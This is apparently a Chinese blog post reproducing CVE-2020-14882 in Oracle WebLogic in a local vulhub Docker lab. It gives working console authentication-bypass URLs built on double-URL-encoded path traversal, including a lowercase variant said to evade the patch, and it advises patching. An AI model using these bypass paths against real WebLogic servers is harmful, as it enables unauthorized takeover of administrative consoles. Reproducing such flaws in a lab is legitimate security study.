HTTP_Oracle_Weblogic_远程代码执行漏洞[CVE-2020-14882]

最新推荐文章于 2024-07-10 10:00:00 发布
最新推荐文章于 2024-07-10 10:00:00 发布
阅读量882 收藏
点赞数
分类专栏: 网络安全技术学习 文章标签: http 网络 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/orchid_sea/article/details/125788548
版权

漏洞描述

WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。

Oracle WebLogic Server 远程代码执行漏洞POC已经被公开,未经身份验证的远程攻击者可以构造特殊的HTTP请求,在未经身份验证的情况下接管 WebLogic Server Console ,并利用该漏洞在受影响的 WebLogic Server 上执行任意代码。鉴于该漏洞影响范围广,危害程度较大,请受影响的各单位立即更新补丁。

影响范围

Oracle WebLogic Server 10.3.6.0.0;
Oracle WebLogic Server 12.1.3.0.0;
Oracle WebLogic Server 12.2.1.0.0;
Oracle WebLogic Server 12.2.1.4.0;
Oracle WebLogic Server 14.1.1.0.0。

漏洞复现

1. 环境配置

git clone  https://github.com/vulhub/vulhub.git

在这里插入图片描述在这里插入图片描述
因为我docker之前就配置好了,直接启动就可以了
(可以使用python3自带的pip安装工具去安装)
在这里插入图片描述访问http://127.0.0.1:7001/console,即可部署weblogic环境
在这里插入图片描述

2. 绕过后台登录

http://127.0.0.1:7001/console/images/%252E%252E%252Fconsole.portal

在这里插入图片描述

‘%252E%252E%252F’即为二次URL编码过后的‘../’,通过这个就可以实现穿越路径未授权访问相关管理后台

在这里插入图片描述
在这里插入图片描述

也可以用另一个POC

/console/css/%25%32%65%25%32%65%25%32%66console.portal

大写换成小写可绕过补丁:
/console/css/%252e%252e%252fconsole.portal

在这里插入图片描述

参考链接:https://www.cnblogs.com/backlion/p/13951858.html

777sea
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2020-14882 WebLogic远程代码执行漏洞复现
千寻的博客
12-17 1万+
Weblogic简介 WebLogic Server是美国Oracle公司的主要产品之一,其主要用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用,是商业市场上主要的Java(J2EE)应用服务器软件之一。 漏洞描述 2020年10月28日,Oracle发布的10月安全更新中的Oracle WebLogic Server 远程代码执行漏洞CVE-2020-14882)POC被公开,远程攻击者可以通过发送恶意的HTTP GET 请求。成功利用此漏洞的攻击者可在未经身份验证的情况下控制 We
Oracle WebLogic Server远程代码执行漏洞
君悅黎心
11-10 3892
Oracle WebLogic Server远程代码执行漏洞(CNNVD-201810-781、CVE-2018-3245)情况报送: 攻击者可利用该漏洞在未授权的情况下发送攻击数据,通过T3协议在WebLogic Server中执行反序列化操作,最终实现远程代码执行WebLogic Server 10.3.6.0、12.1.3.0、12.2.1.2、12.2.1.3等版本均受漏洞影响。目前, ...
2024年CentOS RHEL 系统更新安全补丁的方法_怎样升级red hat 补丁(2),网络安全音频面试
2401_84264244的博客
05-05 397
默认情况下, cron 任务被配置成了立即下载并安装所有更新,但是我们可以通过在 /etc/sysconfig/yum-cron 配置文件中把下面两个参数改为yes,从而改变这种行为。为了使来自 root@localhost 的通知能够通过邮件发送给同一账户(再次说明,你可以选择其他账户,如果你想这样的话),下面这些行也是必须的。安装完成以后,打开/etc/yum/yum-cron.conf,然后找到下面这些行内容,你必须确保它们的值和下面展示的一样。而其它的行保证了能够通知并自动下载、安装安全升级。
Weblogic 管理控制台未授权远程命令执行漏洞CVE-2020-14882CVE-2020-14883)
最新发布
m0_68045701的博客
07-10 1993
2020年10月的更新中,Oracle官方修复了两个长亭科技安全研究员@voidfyoo 提交的安全漏洞,分别是CVE-2020-14882CVE-2020-14883。CVE-2020-14882允许未授权的用户绕过管理控制台的权限验证访问后台,CVE-2020-14883允许后台任意用户通过HTTP协议执行任意命令。首先,我们需要构造一个XML文件,并将其保存在Weblogic可以访问到的服务器上,如。访问后台后是一个低权限的用户,无法安装应用,也无法直接执行任意代码
WebLogic Server使用Oracle HTTP Serve
weixin_39568073的博客
09-19 144
删除位置在看看
Oracle 警告:Weblogic 服务器中含有多个可遭远程利用的严重漏洞
smellycat000的专栏
07-23 297
聚焦源代码安全,网罗国内外最新资讯!编译:奇安信代码卫士本周二,Oracle 发布2021年7月关键补丁季度更新,发布了多款产品的342个修复方案,其中某些可遭远程攻击者用于控制受影响系...
Weblogic Console远程代码执行漏洞(CVE-2020-14882)
Li-D的博客
06-04 7075
漏洞描述 2020年10月30日, Oracle 官方的 CVE-2020-14882 Weblogic 代码执行漏洞最新补丁可被绕过,该漏洞编号为 CVE-2020-14882远程攻击者可以构造特殊的 HTTP 请求,在未经身份验证的情况下接管 WebLogic Server Console ,并在 WebLogic ServerConsole 执行任意代码。 影响版本 Oracle WeblogicServer 10.3.6.0.0 Oracle WeblogicServer 12.1.3.0
Oracle WebLogic Server远程代码执行漏洞 CVE-2020-14750 已亲自复现_cve-2020-14750漏洞复现
2401_83739434的博客
04-03 2534
环境启动后,访问http://192.168.63.129:7001/console/login/LoginForm.jsp,说明已成功启动。
Weblogic反序列化远程代码执行漏洞(CVE-2018-2893)以及安装步骤
11-23
Weblogic反序列化远程代码执行漏洞CVE-2018-2893)是Oracle WebLogic Server中一个严重安全问题,它允许攻击者通过发送恶意构造的序列化对象来执行任意代码,从而获得对服务器的完全控制。这个漏洞存在于WebLogic ...
Weblogic反序列化远程代码执行漏洞(CVE-2018-2893)
09-14
Weblogic反序列化远程代码执行漏洞CVE-2018-2893)是Oracle WebLogic Server中一个严重安全问题,它涉及到组件T3协议处理中的对象反序列化过程。该漏洞允许攻击者通过构造恶意的T3请求,远程执行任意代码,从而...
oracle weblogic漏洞,Oracle WebLogic RCE反序列化漏洞分析
weixin_39667398的博客
04-08 375
Author: Zhiyi Zhang of 360 ESG Codesafe Team前言Oracle 官方在7月份发布关键补丁更新之后,我在当月随后陆续提交了一些weblogic的不同类型漏洞,由于官方并 没有全部修复完成,本次的补丁修复了我报送的6个漏洞,其中有3个漏洞由于某些原因合并成1个CVE,本文针对10 月份这次补丁修复的其他两个漏洞进行简单分析。其中CVE-2018-3245是补来...
CVE-2024-21006-weblogic远程命令执行漏洞
zwy15288408160的博客
04-25 3940
Oracle WebLogic Server 存在远程命令执行漏洞CVE-2024-21006),该漏洞源于T3/IIOP协议存在缺陷,未经身份验证的攻击者可通过T3/IIOP协议受影响的服务器发送恶意的请求,利用LDAP工具执行任意代码
oracle11g远程命令执行漏洞,漏洞应急|Oracle Weblogic Server远程代码执行漏洞CVE-2021-2109)...
weixin_32958777的博客
04-03 916
近日,锐捷网络CERT安全应急响应团队关注到Oracle官方发布了2021年1月关键补丁更新公告,该补丁中修补了包括 CVE-2021-2109 Weblogic Server远程代码执行漏洞在内的多个高危严重漏洞。在CVE-2021-2109漏洞中,攻击者可构造恶意请求,造成JNDI注入、执行任意代码,从而控制服务器。针对以上漏洞,锐捷安全能够进行漏洞扫描与检测,并做安全防护。漏洞复现环境:We...
WeblogicCVE-2020-14882CVE-2020-14883) 管理控制台未授权远程命令执行漏洞
god_Zeo的安全博客
11-02 6185
WeblogicCVE-2020-14882CVE-2020-14883) 管理控制台未授权远程命令执行漏洞 0x01 漏洞简述 2020年10月29日,360CERT监测发现 Weblogic ConSole HTTP 协议代码执行漏洞,该漏洞编号为 CVE-2020-14882,CVE-2020-14883 ,漏洞等级:严重,漏洞评分:9.8。 远程攻击者可以构造特殊的HTTP请求,在未经身份验证的情况下接管 WebLogic Server Console,并在 WebLogic Server Co
Weblogic Server RCE(CVE-2020-14882CVE-2020-14883)复现
weixin_42558965的博客
01-07 811
复现场景:docker、CentOS7、windows物理机 浮现过程: 使用vulhub-master配合docker搭建,进入weblogic/CVE-2020-14882文件夹下搭建环境: docker-compose up -d 成功搭建后在物理机上访问靶机IP+端口(默认7001),如下图所示: 访问靶机IP+端口(默认7001)/console如下图所示: 首先复现CVE-2020-14882绕过验证权限漏洞: 访问URL: http://靶机IP:7001/console/css/%25
oracle数据库警告,Oracle数据库高危漏洞警告!
weixin_32111725的博客
04-13 600
最近在互联网上暴露出一个Oracle的高危漏洞,利用该漏洞,仅有查询权限的用户可以对数据进行增、删、改操作,非常危险。该漏洞影各位用户,最近在互联网上暴露出一个Oracle的高危漏洞,利用该漏洞,仅有查询权限的用户可以对数据进行增、删、改操作,非常危险。该漏洞影响范围非常广泛,包括在国内最常见的11.2.0.3,11.2.0.4,12.1等版本。该漏洞在2014年7月的CPU中被修正,但是如果用户...
Web中间件常见安全漏洞
KHOST的博客
03-19 8317
第一章:IIS IIS 6 解析漏洞 IIS 7 解析漏洞 PUT任意文件写入 IIS短文件漏洞 HTTP.SYS远程代码执行 (MS15-034) RCE-CVE-2017-7269 第二章:Apache 未知扩展名解析漏洞 AddHandler导致的解析漏洞 ...
oracle 漏洞更新吗,【漏洞通告】Oracle 1月多个安全漏洞
weixin_29192211的博客
04-08 689
0x00漏洞概述2021年01月19日,Oracle发布了1月份的安全更新,本次发布的安全更新共计329个,涉及Oracle E-Business Suite、Fusion Middleware、MySQL、Database、Java SE、Oracle Construction and Engineering Suite等多个产品和组件。0x01漏洞详情部分漏洞列表如下:Oracle E-Bus...
Weblogic RCE漏洞CVE-2020-14882&14883:复现与影响版本解析
近期,两个关键性漏洞 CVE-2020-14882CVE-2020-14883 被发现,这些漏洞的存在使得未经授权的远程攻击者能够通过精心构造的GET请求,在受影响的Weblogic Server上执行任意代码。这两个漏洞影响了多个版本,包括...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值